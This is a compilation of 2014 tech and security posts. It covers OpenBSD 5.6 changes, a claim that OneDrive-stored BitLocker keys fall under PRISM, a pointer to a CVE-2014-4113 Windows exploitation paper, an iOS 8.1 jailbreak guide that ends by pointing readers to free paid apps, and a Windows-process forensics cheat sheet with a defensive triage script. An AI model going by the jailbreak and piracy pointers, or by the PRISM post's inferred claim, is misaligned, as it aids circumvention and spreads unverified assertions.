  [*]Constrain fdisk(8) '-l' to disk sizes of 64 blocks or more.
  [*]Sync fdisk(8) built-in MBR with current /usr/mdec/mbr.
  [*]Quiet dhclient(8) '-q' even more.
  [*]Log less redundant dhclient(8) info.
  [*]New leases, lease renewals, cable state changes more obvious to applications monitoring dhclient(8) files.
  [*]Preserve chronological order of leases in the dhclient.leases(5) leases files.
  [*]Use 'lease {}' statements in dhclient.conf(5), allowing interfaces to get an address when no dynamic lease is available.
  [*]Improve dhclient(8) parsing and printing of classless static routes.
  [*]Eliminate unnecessary rewrites of resolv.conf(5) by dhclient(8).
  [*]Added sendsyslog(2): syslog(3) now works even when out of file descriptors or in a chroot.
  [*]Added errc(3), verrc(3), warnc(3) and vwarnc(3).
  [*]Faster hibernate/unhibernate performance on amd64 and i386 platforms.
  [*]Support hibernating to softraid(4) crypto volumes.
  [*]Improved performance of seekdir(3) to start of current buffer.
  [*]Added <endian.h> per the revision of the POSIX spec in progress.
  [*]Apache has been removed.
  [*]Read support for ext4 filesystems.
  [*]Reworked mplocks as ticket locks instead of spinlocks on amd64, i386, and sparc64. This provides fairer access to the kernel lock between logical CPUs, especially in multi socket systems.
[*]OpenSSH 6.7
  Potentially-incompatible changes:
  [*]sshd(8): The default set of ciphers and MACs has been altered to remove unsafe algorithms. In particular, CBC ciphers and arcfour* are disabled by default.
  [*]sshd(8): Support for tcpwrappers/libwrap has been removed.
  [*]OpenSSH 6.5 and 6.6 have a bug that causes ~0.2% of connections using the "curve25519-sha256@libssh.org" KEX exchange method to fail when connecting with something that implements the specification correctly. OpenSSH 6.7 disables this KEX method when speaking to one of the affected versions.
  New/changed features:
  [*]Major internal refactoring to begin to make part of OpenSSH usable as a library. So far the wire parsing, key handling and KRL code has been refactored. Please note that we do not consider the API stable yet, nor do we offer the library in separable form.
  [*]ssh(1), sshd(8): Add support for Unix domain socket forwarding. A remote TCP port may be forwarded to a local Unix domain socket and vice versa or both ends may be a Unix domain socket.
  [*]ssh(1), ssh-keygen(1): Add support for SSHFP DNS records for Ed25519 key types.
  [*]sftp(1): Allow resumption of interrupted uploads.
  [*]ssh(1): When rekeying, skip file/DNS lookups of the hostkey if it is the same as the one sent during initial key exchange. (bz#2154)
  [*]sshd(8): Allow explicit ::1 and 127.0.0.1 forwarding bind addresses when GatewayPorts=no; allows client to choose address family.
  (bz#2222)
  [*]sshd(8): Add a sshd_config(5) PermitUserRC option to control whether ~/.ssh/rc is executed, mirroring the no-user-rc authorized_keys option. (bz#2160)
  [*]ssh(1): Add a %C escape sequence for LocalCommand and ControlPath that expands to a unique identifier based on a hash of the tuple of (local host, remote user, hostname, port). Helps avoid exceeding miserly pathname limits for Unix domain sockets in multiplexing control paths. (bz#2220)
  [*]sshd(8): Make the "Too many authentication failures" message include the user, source address, port and protocol in a format similar to the authentication success/failure messages. (bz#2199)
  [*]Added unit and fuzz tests for refactored code.
  The following significant bugs have been fixed in this release:
  [*]sshd(8): Fix remote forwarding with same listen port but different listen address.
  [*]ssh(1): Fix inverted test that caused PKCS#11 keys that were explicitly listed in ssh_config(5) or on the commandline not to be preferred.
  [*]ssh-keygen(1): Fix bug in KRL generation: multiple consecutive revoked certificate serial number ranges could be serialised to an invalid format. Readers of a broken KRL caused by this bug will fail closed, so no should-have-been-revoked key will be accepted.
  [*]ssh(1): Reflect stdio-forward ("ssh -W host:port ...") failures in exit status. Previously we were always returning 0. (bz#2255)
  [*]ssh(1), ssh-keygen(1): Make Ed25519 keys' title fit properly in the randomart border. (bz#2247)
  [*]ssh-agent(1): Only cleanup agent socket in the main agent process and not in any subprocesses it may have started (e.g. forked askpass). Fixes agent sockets being zapped when askpass processes fatal(). (bz#2236)
  [*]ssh-add(1): Make stdout line-buffered; saves partial output getting lost when ssh-add(1) fatal()s part-way through (e.g. when listing keys from an agent that supports key types that ssh-add(1) doesn't).
  (bz#2234)
  [*]ssh-keygen(1): When hashing or removing hosts, don't choke on "@revoked" markers and don't remove "@cert-authority" markers. (bz#2241)
  [*]ssh(1): Don't fatal when hostname canonicalisation fails and a ProxyCommand is in use; continue and allow the ProxyCommand to connect anyway (e.g. to a host with a name outside the DNS behind a bastion).
  [*]scp(1): When copying local->remote fails during read, don't send uninitialised heap to the remote end.
  [*]sftp(1): Fix fatal "el_insertstr failed" errors when tab-completing filenames with a single quote char somewhere in the string. (bz#2238)
  [*]ssh-keyscan(1): Scan for Ed25519 keys by default.
  [*]ssh(1): When using VerifyHostKeyDNS with a DNSSEC resolver, down-convert any certificate keys to plain keys and attempt SSHFP resolution. Prevents a server from skipping SSHFP lookup and forcing a new-hostkey dialog by offering only certificate keys.
  [*]sshd(8): Avoid crash at exit via NULL pointer reference. (bz#2225)
  [*]Fix some strict-alignment errors.
[*]mandoc 1.13.0:
  [*]New implementation of apropos(1), whatis(1), and makewhatis(8) based on SQLite3 databases.
  [*]Substantial improvements of mandoc(1) error and warning messages.
  [*]Almost complete implementation of roff(7) numerical expressions.
  [*]About a dozen minor new features and numerous bug fixes.
[*]Ports and packages:
  [*]Over 8,800 ports.
  [*]Many pre-built packages for each architecture:
    i386: 8588      amd64: 8588     arm: 5633      mips64: 4686
    sparc64: 7965   powerpc: 8049   hppa: 6143     mips64el: 6697
    alpha: 6278     m88k: 2475      vax: 1995
    sh: 2626        sparc: 3394
  [*]Some highlights:
    GNOME 3.12.2
    KDE 3.5.10
    KDE 4.13.3
    Xfce 4.10
    MySQL 5.1.73
    PostgreSQL 9.3.4
    Postfix 2.11.1
    OpenLDAP 2.3.43 and 2.4.39
    Mozilla Firefox 31.0
    Mozilla Thunderbird 31.0
    GHC 7.6.3
    LibreOffice 4.1.6.2
    Emacs 21.4 and 24.3
    Vim 7.4.135
    PHP 5.3.28, 5.4.30 and 5.5.14
    Python 2.7.8, 3.3.5 and 3.4.1
    Ruby 1.8.7.374, 1.9.3.545, 2.0.0.481 and 2.1.2
    Tcl/Tk 8.5.15 and 8.6.1
    JDK 1.6.0.32 and 1.7.0.55
    Mono 3.4.0
    Chromium 36.0.1985.125
    Groff 1.22.2
    Go 1.3
    GCC 4.6.4, 4.8.3 and 4.9.0
    LLVM/Clang 3.5 (20140228)
    Node.js 0.10.28
[*]As usual, steady improvements in manual pages and other documentation.
[*]The system includes the following major components from outside suppliers:
  Xenocara (based on X.Org 7.7 with xserver 1.15.2 + patches, freetype 2.5.3, fontconfig 2.11.1, Mesa 10.2.3, xterm 309, xkeyboard-config 2.11 and more)
  Gcc 4.2.1 (+ patches) and 3.3.6 (+ patches)
  Perl 5.18.2 (+ patches)
  Nginx 1.6.0 (+ patches)
  SQLite 3.8.4.3 (+ patches)
  Sendmail 8.14.8, with libmilter
  Bind 9.4.2-P2 (+ patches)
  NSD 4.0.3
  Unbound 1.4.22
  Sudo 1.7.2p8
  Ncurses 5.7
  Binutils 2.15 (+ patches)
  Gdb 6.3 (+ patches)
  Less 458 (+ patches)
  Awk Aug 10, 2011 version

[h=3]How to install[/h]
Following this are the instructions which you would have on a piece of paper if you had purchased a CDROM set instead of doing an alternate form of install. The instructions for doing an FTP (or other style of) install are very similar; the CDROM instructions are left intact so that you can see how much easier it would have been if you had purchased a CDROM instead.

Source: OpenBSD 5.6
-
[h=1]Windows 8.1: Black Belt Security[/h]
Date: October 31, 2014 from 10:15AM to 11:30AM
Day 4, Hall 8.1 Room G, WIN-B318
Speaker: Sami Laiho

Learn why and how you should leverage the Windows 8.1 security technologies like BitLocker, AppLocker, UAC, Least Privilege and Remote Desktop Restricted Admin mode. In this 75 minute bombardment against the Windows OS you will see scary hands-on examples on how to break into an unprotected OS. If you still need to convince your boss to give you budget for implementing more security measures you don't want to miss this! Sami's black belt session was evaluated as the best session in TechEd North America 2014, TechEd Australia 2013 and as the best session by an external speaker in TechEd Europe 2013.

Source: Windows 8.1: Black Belt Security | TechEd Europe 2014 | Channel 9
-
1 November 2014
Microsoft OneDrive in NSA PRISM

A sends:

1) BitLocker keys are uploaded to OneDrive by 'device encryption'.
"Unlike a standard BitLocker implementation, device encryption is enabled automatically so that the device is always protected. ... If the device is not domain-joined a Microsoft Account that has been granted administrative privileges on the device is required. When the administrator uses a Microsoft account to sign in, the clear key is removed, a recovery key is uploaded to online Microsoft account and TPM protector is created."
What's New in BitLocker in Windows and Windows Server

2) Device encryption is supported by BitLocker for all SKUs that support connected standby. This would include Windows phones.
"BitLocker provides support for device encryption on x86 and x64-based computers with a TPM that supports connected stand-by. Previously this form of encryption was only available on Windows RT devices."
What's New in BitLocker in Windows and Windows Server

3) The tech media and feature articles recognise this.
"... because the recovery key is automatically stored in SkyDrive for you."
Surface, BitLocker, and the future of encryption | ZDNet

4) Here's how to recover your key from Sky/OneDrive.
"Your Microsoft account online. This option is only available on non-domain-joined PCs. To get your recovery key, go to ...onedrive.com..."
BitLocker recovery keys: Frequently asked questions - Windows Help

5) SkyDrive (now named OneDrive) is onboarded to PRISM. (pg 26/27)
http://hbpub.vo.llnwd.net/o16/video/olmk/holt/greenwald/NoPlaceToHide-Documents-Uncompressed.pdf

Source: Microsoft OneDrive in NSA PRISM
-
After eight years of work, HTML5 is finalized HTML5 was designed to move the Web from serving static documents to becoming a full-fledged platform for building apps By Joab Jackson After nearly eight years of work, the World Wide Web Consortium (W3C) has finalized the HTML5 standard, bringing the basic Web technology firmly into the era of mobile devices and cloud-driven rich Internet applications. "HTML5 brings the next generation of the Web," said W3C CEO Jeff Jaffe. "It wasn't so long ago that the Web was about browsing static documents. Today's Web is a much richer platform." Although Web and mobile developers have been using parts of the HTML5 specification for several years, the finished specification -- which the W3C calls a recommendation -- ensures developers that the code they develop for the Web will work going forward. "We're now at a stable state that everyone can build to the standard and be certain that it will be implemented in all browsers," Jaffe said. "If we didn't have complete interoperability, we wouldn't have one Web." In 1989, physicist Tim Berners-Lee created the first version of the HTML as a way to format and link together written materials so they could be accessed over the Internet. In the years since, the resulting World Wide Web has come to serve billions of users all manner of content, from movies and music to full-fledged applications. The HTML5 final recommendation, over 1,370 pages in length, addresses this complex environment. HTML5 provides a way to serve multimedia content and application functionality without relying on proprietary plug-ins to the browser. It also addresses a wide range of other uses for the Web, such as delivering scalable vector graphics (SVG) and math annotations (MathML). Today, HTML5 provides a "write-once, run-anywhere" cross-platform alternative to writing applications for multiple mobile platforms, such as Android and Apple iOS devices, Jaffe said. 
About 42 percent of mobile application developers are using HTML, along with JavaScript and Cascading Style Sheets (CSS) to build their apps, according to a 2014 survey from mobile analysis firm Vision Mobile. The W3C hopes the specification will be a cornerstone for future work in what it calls the Open Web Platform, an even richer set of standards for building cross-platform vendor neutral online applications. Moving forward, the W3C is developing specifications for real-time communications, electronic payments and application development. It is also creating a set of safeguards for privacy and security. Ian Hickson, now employed at Google, served as the principal architect of the HTML5 specification, and engineers at Microsoft, IBM and Apple served as co-chairs for the working group. Over 45,000 emails were exchanged when drafting the document, from representatives of 60 companies.

Source: After eight years of work, HTML5 is finalized | Computerworld
-
Exploiting CVE-2014-4113 on Windows 8.1
October 31, 2014
Moritz Jodeit <moritz@jodeit.org>

Table of Contents
1 Introduction
2 Vulnerability Details
3 Exploitation on Windows 8.1
  3.1 Crafting the win32k!tagWND structure
  3.2 Finding an overwrite target
  3.3 Combining all steps
4 Conclusion

Download: http://www.jodeit.org/research/Exploiting_CVE-2014-4113_on_Windows_8.1.pdf
-
Easy Jailbreak 8.1 Untethered Guide – One Click Cydia Bundle Pangu 1.1: All iOS 8 Devices
Posted 31 October 2014

How to Jailbreak 8.1 Untethered iOS 8 via Pangu 1.1 One-Click Cydia Bundle on iPhone 6 Plus, 6, iPhone 5S, 4S and iPad Air 2, Mini 3, 4 – Pangu is on fire, they’ve done it again, we now have a simplified jailbreak 8.1 solution. Today, following a plethora of recent developments and releases, the Pangu Team released a near-perfect iteration of their Pangu for iOS 8 utility that’s capable of providing an Untethered jailbreak on 8.1 for all iPhone, iPad and iPod touch models. While the group of Chinese-based hackers previously issued the first iteration of their jailbreak tool for iOS 8.1 last week, said tool was mostly intended for jailbreak tweak developers and advanced users – now, with today’s release, Pangu has pushed out a utility intended for the masses. The new Pangu 1.1 jailbreak iOS 8.1 tool finally comes bundled with Cydia (the graphical user interface, and distribution platform, for third-party iOS tweaks that has effectively monopolized the jailbreak scene). Jailbreaking 8.1 on the iPhone 6 Plus, iPhone 6, iPhone 5s, iPhone 5c, iPhone 4s, the new iPad Air 2 and iPad mini 3, the original iPad Air, the iPad Mini 2 with Retina display, iPad 4, the original iPad mini, iPad 3, iPad 2 and, last but certainly not least, the 5th generation iPod touch on 8.0 through 8.1 has never been easier! Continue reading past the break for complete instructions on how to jailbreak any of the aforementioned iDevices running 8.1 completely Untethered.

How To Jailbreak 8.1 Untethered iPhone 6 Plus, 6, 5S, iPad Air 2, Mini 3, 4 And iPod Touch
This guide will assist you in not only jailbreaking iOS 8.x, but also installing Cydia in an all-new, one-shot method employing the use of the Pangu Team’s updated Pangu 1.1 utility.
As previously stated, the newest iteration of the Pangu jailbreak 8.1 utility supports the following iDevice models running iOS 8 through 8.1:
[*]iPhone 6 Plus
[*]iPhone 6
[*]iPhone 5s, 5c, 5, iPhone 4S
[*]iPad Air 2, 1
[*]iPad Mini 3, 2, 1
[*]iPad 4, 3, as well as the iPad 2
[*]iPod touch 5th generation

Jailbreak iOS 8 – 8.1 Requirements: All iPhone, iPod Touch And iPad Models
Before proceeding any further with this guide, ensure that you have, and complete, the following, as all are necessary to ensure the success of an untethered jailbreak on Apple’s latest public firmware(s).
[*]Any of the above iDevices running iOS 8 through 8.1 that were not updated through the Settings app’s OTA (over-the-air) update option. If you performed an OTA update, follow the below prerequisite instructions. Also, ensure that your device does not have a passcode set or Find my iPhone enabled, both of which can be set back post jailbreak – this is very important.
[*]A Windows-based PC – while Mac OS X isn’t officially supported, Pangu should update their utility soon. For the time being, either create a Windows partition using Boot Camp Assistant or set up a virtual machine; numerous tutorials can be found online for either option.
[*]The latest version of iTunes, as well as the all-new 1.1 Pangu Windows jailbreak iOS 8.1 utility, both of which can be found, and downloaded, from the download section below.

iOS 8.1 Jailbreak OTA And Prerequisite Instructions, Which Are Crucial
Also, as alluded to in the second step, if you updated your device through Apple’s OTA update ability or you want to ensure that you don’t encounter issues (and you prefer to err on the side of caution) follow the below steps to guarantee a successful jailbreak.
1. Plug your device into your computer via USB and initiate a complete backup inside iTunes.
2. Restore to a clean build of iOS 8.1 by clicking the option to perform a restore.
3.
Jailbreak 8.1 following this guide and, once you’ve jailbroken successfully, restore from the backup that you created when following the first step.

Now, without further ado, we can continue with the steps required to jailbreak iOS 8.1 on any iPhone, iPad or iPod touch that’s able to run the latest firmware.

How To Jailbreak 8.1 Untethered With Pangu: All iOS 8 Devices – Written And Video Tutorials
Step 1. In addition to, and beyond, Pangu for iOS 8, download the latest version of iTunes from our download section, listed below, to ensure that you’ve obtained genuine Pangu and Apple software, respectively.
Step 2. Following your download of Pangu for iOS 8 version 1.1, plug your iPhone, iPad or iPod into your PC via Apple’s standard Lightning USB cable, or 30-pin connector cable for the iPhone 4s and older iPad models.
Step 3. Enter Airplane mode, a step that is fundamental to the jailbreak, and click the blue button at the bottom of the Pangu utility to continue on to jailbreak 8.1.
Step 4. Conditional: if Pangu gets stuck towards the end of the on-screen progress bar, find the ‘Pangu New’ app on your device’s springboard, launch it and verify the developer. Upon a successful load, the Pangu utility will proceed to jailbreak iOS 8.1 without further interruption.
Step 5. Leave your iPhone, iPad or iPod touch connected to your computer, don’t interface with it, and, once your device reboots, you’ll be greeted with a welcome sight in what was previously a blank space on your device’s springboard: Cydia.

Congratulations, after following, and completing, five simple and easy-to-understand steps, you’ve successfully jailbroken your iPod touch, iPhone or iPad running iOS 8 through 8.1! Also, while you’re well on your way to enjoying the countless benefits of jailbreaking, avoid the installation of incompatible tweaks, and those that have yet to be updated for support on iOS 8.x, as they’re unquestionably harmful.

Jailbreak iOS 8.1 Pangu Download Section: Pangu 1.1
1.
Pangu 8.1 Jailbreak download for Windows-based PC users.
2. Apple’s latest iteration of iTunes, which is required for Pangu to recognize your device and, in turn, jailbreak.
3. The iOS 8.1 IPSW, which should be used to restore to if you wish to ensure the success of your jailbreak on iOS 8.

Finally, as a concluding note, for those of you interested in earning paid iOS 8.1 App Store apps for free, we advise checking out FreeAppLife inside of Safari on your iDevice, regardless of its jailbreak status. Thanks for both reading and following our detailed Untethered jailbreak 8.1 and iOS 8 tutorial.

Source: Easy Jailbreak 8.1 Untethered Tutorial With Cydia - One-Click Pangu
-
Know your Windows Processes or Die Trying

I have been talking with quite a few people lately tasked with “security” inside their organizations and couldn’t help but notice their lack of understanding when it came to Windows process information. I figured if the people I have talked with don’t understand then there are probably a lot more people that don’t understand. I’m guessing quite a few people that consider themselves “experts” as well. I decided to write this post in an effort to help the individuals that may not have the knowledge, free time, training budgets, etc. to explore Windows processes. For about $50 – $75 (few books) and some free time you can learn pretty much everything needed to know about Windows processes. My goal isn’t to dive very deep into each of the processes. I figured a bulleted “cheat sheet” vs. wordy descriptions will be best for my intended audience. The people that want to dive deeper can buy themselves a copy of Windows Internals, 6th Edition Part I and II, fire up Process Explorer/Process Hacker, and start reading the great documentation by the Volatility team (references below).

Note: The information below focuses on Windows 7 processes as more and more organizations are *finally* starting to migrate away from Windows XP. I wanted to give those folks a head start.

Let’s break it down….

Idle and System
[*]Created by ntoskrnl.exe via the process manager function, which creates and terminates processes and threads.
[*]No visible parent processes
[*]System has a static PID of 4
[*]System creates smss.exe
[*]There should only be one system process running

SMSS – Session Manager
[*]First user mode process
[*]Parent process is System
[*]Base Priority of 11
[*]Username: NT AUTHORITY\SYSTEM
[*]Performs delayed file delete/rename changes
[*]Loads known dlls
[*]Runs from %systemroot%\System32\smss.exe
[*]Creates session 0 (OS services)
[*]Creates session 1 (User session)
[*]Creates csrss and winlogon then exits, which is why they have no parent process and they both have session ids of 1
[*]Runs within session 0
[*]Only one smss.exe process should be running at one time. The second smss.exe process exits, so you will only see the one running in session 0. There can be more sessions if more users are logged on to the system. 0 and 1 are for a single user logged onto the system.

CSRSS.EXE – Client/Server Run
[*]Windows subsystem process.
[*]Base Priority of 13
[*]%SystemRoot%\system32\csrss.exe
[*]Username: NT AUTHORITY\SYSTEM
[*]Creates/Deletes processes and threads, Temp files, etc.
[*]In XP it’s used to draw text based console windows. Under Windows 7, the conhost process now does that functionality. For example, cmd.exe
[*]One csrss process per session
[*]Its name is often used by malware to hide on systems (CSSRS.EXE, CSRSSS.EXE, etc.)
[*]Runs within session 0

WININIT.EXE – Windows Initialization Process
[*]Parent to services.exe (SCM), lsass.exe and lsm.exe
[*]Created by smss.exe, but since smss.exe exits there is no parent to WININIT.
[*]Base Priority of 13
[*]Username: NT AUTHORITY\SYSTEM
[*]%SystemRoot%\system32\wininit.exe
[*]Performs user-mode initialization tasks
[*]Creates %windir%\temp
[*]Runs within session 0

SERVICES.EXE – Service Control Manager
[*]Child to WININIT.EXE
[*]Parent to services such as svchost.exe, dllhost.exe, taskhost.exe, spoolsv.exe, etc.
[*]Services are defined in SYSTEM\CurrentControlSet\Services
[*]%SystemRoot%\System32\wininit.exe
[*]Username: NT AUTHORITY\SYSTEM
[*]Base Priority of 9
[*]Loads a database of services into memory
[*]Runs within session 0
[*]There should only be one services.exe process running

LSASS.EXE – Local Security Authority
[*]Child to WININIT.EXE
[*]Only one lsass.exe process
[*]%SystemRoot%\System32\lsass.exe
[*]Responsible for local security policy to include managing users allowed to login, password policies, writing to the security event log, etc.
[*]Often targeted by malware as a means to dump passwords. Also mimicked by malware to hide on a system (lass.exe, lssass.exe, lsasss.exe, etc.). These “fake” names will not be children of wininit.exe.
[*]Base Priority of 9
[*]Username: NT AUTHORITY\SYSTEM
[*]Runs within session 0
[*]It should not have child processes

SVCHOST.EXE – Service Hosting Process
[*]Multiple instances of svchost.exe can/do exist/run
[*]%SystemRoot%\System32\svchost.exe
[*]Username: Should only be one of three options: NT AUTHORITY\SYSTEM, LOCAL SERVICE, or NETWORK SERVICE
[*]Should always have a parent of services.exe
[*]Base Priority of 8
[*]Often mimicked (scvhost, svch0st, etc.) When they are mimicked they will not be running as children to services.exe.
[*]Command Line: svchost.exe -k <name>
[*]-k <name> values should exist within the Software\Microsoft\Windows NT\CurrentVersion\Svchost registry key
[*]Often times when malware uses the actual svchost.exe to load their malicious service they will not include -k command line parameters and be running under a username that does not match one of the three listed in bullet 3.
[*]They should all be running within session 0

LSM.EXE – Load Session Manager Service
[*]Manages the state of terminal server sessions on the local machine. Sends the requests to smss.exe to start new sessions.
Child to wininit.exe It should not have child processes Receives logon/off, shell start and termination, connect/disconnects from a session, and lock/unlock desktop I have not personally seen malware try and impersonate LSM.exe, but there is always a first so keep your eyes open. %systemroot%\System32\lsm.exe Base Priority of 8 Username: NT AUTHORITY\SYSTEM Runs within session 0 WINLOGON.EXE – Windows Logon Process No parent process Could have a child process of LogonUI if smartcard, etc. are used to authenticate LogonUI will terminate once the user enters their password. Once password is entered the verification is sent over to LSASS and it’s verified via Active Directory or SAM (the registry hive SAM), which stores local users and group information. Base Priority of 13 Runs within session one Handles interactive user logons/logoffs when SAS keystroke combination is entered (Ctrl+Alt+Delete) Loads Userinit within Software\Microsoft\Windows NT\CurrentVersion\Winlogon The userinit value in the registry should be: Userinit.exe, (note the comma). Malware will sometimes add additional values to this key, which will load malware upon successful logons. Userinit.exe exits once it runs so you wont see this process running when you look. Userinit initializes the user environment. This includes running GPOs and logon scripts. Will run Shell value located at Software\Microsoft\Windows NT\CurrentVersion\Winlogon within the registry. The value of shell should be Explorer.exe. Malware will also use this sometimes to execute malware by adding values. Since Userinit exists this is also why Explorer.exe doesn’t have a parent process. Explorer.exe – AKA Windows Explorer No parent process since Userinit.exe exits The value “Explorer.exe” is stored in shell value within the registry. The registry location is here: Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell Base Priority of 8 Username: The logged on user account. 
%Systemroot%\Explorer.exe This will contain multiple child processes. Some of you might know this better as, “Windows Explorer” This process is often targeted by malware. Malware will often times inject this process. One indication of this is if Explorer.exe is connecting out to the internet. There are other indicators, but that’s another post. We are keeping it simple here. Let’s sum this post up by creating a simple checklist to review while looking for malicious/suspect process activity. Check the parent/child relationships of processes. Check which users names the processes are running under Check their command line parameters for those processes that use them. Check their digital signatures Check their base priorities Check the location they are being from Check their spellings Leverage memory analysis to detect hidden and/or injected process. Some malware can hide processes by unlinking them (among other ways). Memory analysis is a must these days. When you get comfortable with everything here, dig deeper and check what modules are typically loaded for each process. Check and see if processes that should not be connecting out to the internet are not Check process privileges If wscript.exe process is running check the command line of what it is running. Investigate processes running inside %temp%, root of %appdata%, %localappdata%, recycle bin, etc. If rundll32.exe is running check its command line as well. “Most” legitimate user applications like Adobe, Web browsers, etc. don’t spawn child processes like cmd.exe. If you see this, they should be investigated. Core Windows processes shouldn’t be communicating out to the internet. If you see communication from these processes, dig deeper. Look for suspicious URLs/IPs, check process strings, etc. So yeah, that’s a quick run down. I’m sure I forgot some stuff so just hit me up via email if I missed something, or got something wrong. I’ve been wanting to get this out of my head and on-to paper for quite awhile. 
I’m working on some IOCs that will incorporate all this. They will be posted here: https://github.com/sysforensics/IOCs If you want to learn more about the “internals” of Windows processes and memory analysis order this book – http://www.amazon.com/gp/product/1118825098 and take the Volatility Memory Analysis course. Enjoy! References: Windows Internals 6th Edition, Part I – http://www.amazon.com/Windows-Internals-Part-Covering-Server%C2%AE/dp/0735648735 Windows Internals 6th Edition, Part II Windows Internals, Part 2 (6th Edition) (Developer Reference): Mark Russinovich, David Solomon, Alex Ionescu: 9780735665873: Amazon.com: Books Windows Exploratory Surgery with Process Hacker by Jason Fossen http://blogs.sans.org/windows-security/files/Process_Hacker_SANS_Jason_Fossen.pdf The Volatility team and their Documentation https://code.google.com/p/volatility/ Volatility Labs Sursa: https://sysforensics.org/2014/01/know-your-windows-processes.html
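The checklist above is easy to apply by hand to one box and tedious across many. The following is an added example (not code from the sysforensics post) that encodes the post's expectations for the core processes (parent, image path, account, session, single instance, the svchost -k argument) plus a look-alike name check and a check for images living in %temp%, %appdata% or the recycle bin. The process listing it runs over is constructed inline for the demonstration; a real run would feed it from tasklist /v, Process Hacker or a Volatility pslist/pstree dump. Names such as Proc, triage and SAMPLE are this example's own.

```python
"""Checklist triage of a Windows process listing against the expectations
in the post above. Added example, not the post's code; SAMPLE is a
constructed Windows 7 style process tree with a few planted anomalies."""
import re
from collections import Counter
from dataclasses import dataclass

SYSTEM = r"NT AUTHORITY\SYSTEM"
LOCAL_SVC = r"NT AUTHORITY\LOCAL SERVICE"
NETWORK_SVC = r"NT AUTHORITY\NETWORK SERVICE"


@dataclass
class Proc:
    pid: int
    ppid: int
    name: str
    path: str
    user: str
    session: int
    cmdline: str


# Expectations per the post. parent=None means the real parent has exited, so
# the ppid must not resolve to a live process. users=None / session=None: any.
EXPECTED = {
    "system":       dict(parent=None, path=None, users={SYSTEM}, session=0, single=True),
    "smss.exe":     dict(parent="system", path=r"\system32\smss.exe", users={SYSTEM}, session=0, single=True),
    "csrss.exe":    dict(parent=None, path=r"\system32\csrss.exe", users={SYSTEM}, session=None, single=False),
    "wininit.exe":  dict(parent=None, path=r"\system32\wininit.exe", users={SYSTEM}, session=0, single=True),
    "services.exe": dict(parent="wininit.exe", path=r"\system32\services.exe", users={SYSTEM}, session=0, single=True),
    "lsass.exe":    dict(parent="wininit.exe", path=r"\system32\lsass.exe", users={SYSTEM}, session=0, single=True),
    "lsm.exe":      dict(parent="wininit.exe", path=r"\system32\lsm.exe", users={SYSTEM}, session=0, single=True),
    "svchost.exe":  dict(parent="services.exe", path=r"\system32\svchost.exe",
                         users={SYSTEM, LOCAL_SVC, NETWORK_SVC}, session=0, single=False),
    "winlogon.exe": dict(parent=None, path=r"\system32\winlogon.exe", users={SYSTEM}, session=1, single=False),
    "explorer.exe": dict(parent=None, path=r"\explorer.exe", users=None, session=1, single=False),
}

# %temp%, %appdata%/%localappdata% and the recycle bin are unusual homes for a process image.
SUSPECT_DIR = re.compile(r"\\(temp|appdata|\$recycle\.bin)\\", re.IGNORECASE)


def levenshtein(a, b):
    """Edit distance, used to spot look-alike names such as scvhost.exe or lsasss.exe."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def triage(procs):
    """Return (pid, name, reason) findings for every process that breaks the checklist."""
    by_pid = {p.pid: p for p in procs}
    counts = Counter(p.name.lower() for p in procs)
    findings = []
    for p in procs:
        name = p.name.lower()

        def flag(reason, p=p):
            findings.append((p.pid, p.name, reason))

        if SUSPECT_DIR.search(p.path):
            flag(f"runs from a suspicious directory: {p.path}")
        exp = EXPECTED.get(name)
        if exp is None:
            # Unknown name: is it within two edits of a core process name?
            for core in EXPECTED:
                if 0 < levenshtein(name, core) <= 2:
                    flag(f"name resembles core process {core} (possible impersonation)")
            continue
        parent = by_pid.get(p.ppid)
        if exp["parent"] is None and parent is not None:
            flag(f"should have no live parent but has {parent.name} (pid {parent.pid})")
        elif exp["parent"] is not None and (parent is None or parent.name.lower() != exp["parent"]):
            flag(f"parent should be {exp['parent']}, got {parent.name if parent else 'none'}")
        if exp["path"] and not p.path.lower().endswith(exp["path"]):
            flag(f"unexpected image path {p.path}")
        if exp["users"] and p.user.upper() not in exp["users"]:
            flag(f"unexpected account {p.user}")
        if exp["session"] is not None and p.session != exp["session"]:
            flag(f"session {p.session}, expected {exp['session']}")
        if exp["single"] and counts[name] > 1:
            flag("more than one instance of a single-instance process")
        if name == "svchost.exe" and "-k" not in p.cmdline.lower():
            flag("svchost.exe without -k <group> on the command line")
    return findings


# Constructed listing: a normal boot tree, a user session, and three planted anomalies.
SAMPLE = [
    Proc(4, 0, "System", "", SYSTEM, 0, ""),
    Proc(272, 4, "smss.exe", r"C:\Windows\System32\smss.exe", SYSTEM, 0, r"\SystemRoot\System32\smss.exe"),
    Proc(348, 340, "csrss.exe", r"C:\Windows\System32\csrss.exe", SYSTEM, 0, ""),     # ppid 340 = exited smss
    Proc(384, 340, "wininit.exe", r"C:\Windows\System32\wininit.exe", SYSTEM, 0, ""),
    Proc(480, 384, "services.exe", r"C:\Windows\System32\services.exe", SYSTEM, 0, ""),
    Proc(488, 384, "lsass.exe", r"C:\Windows\System32\lsass.exe", SYSTEM, 0, ""),
    Proc(496, 384, "lsm.exe", r"C:\Windows\System32\lsm.exe", SYSTEM, 0, ""),
    Proc(600, 480, "svchost.exe", r"C:\Windows\System32\svchost.exe", SYSTEM, 0, "svchost.exe -k DcomLaunch"),
    Proc(680, 480, "svchost.exe", r"C:\Windows\System32\svchost.exe", NETWORK_SVC, 0, "svchost.exe -k RPCSS"),
    Proc(404, 392, "winlogon.exe", r"C:\Windows\System32\winlogon.exe", SYSTEM, 1, ""),
    Proc(1500, 1480, "explorer.exe", r"C:\Windows\explorer.exe", r"WIN7\alice", 1, ""),  # ppid 1480 = exited userinit
    Proc(2400, 348, "conhost.exe", r"C:\Windows\System32\conhost.exe", r"WIN7\alice", 1, ""),
    Proc(2100, 1500, "svchost.exe", r"C:\Windows\System32\svchost.exe", r"WIN7\alice", 1, "svchost.exe"),
    Proc(2200, 1500, "scvhost.exe", r"C:\Users\alice\AppData\Local\Temp\scvhost.exe", r"WIN7\alice", 1, ""),
    Proc(2300, 1500, "lsasss.exe", r"C:\Windows\System32\lsasss.exe", r"WIN7\alice", 1, ""),
]

if __name__ == "__main__":
    for pid, name, reason in triage(SAMPLE):
        print(f"[!] pid {pid:<5} {name:<14} {reason}")
```

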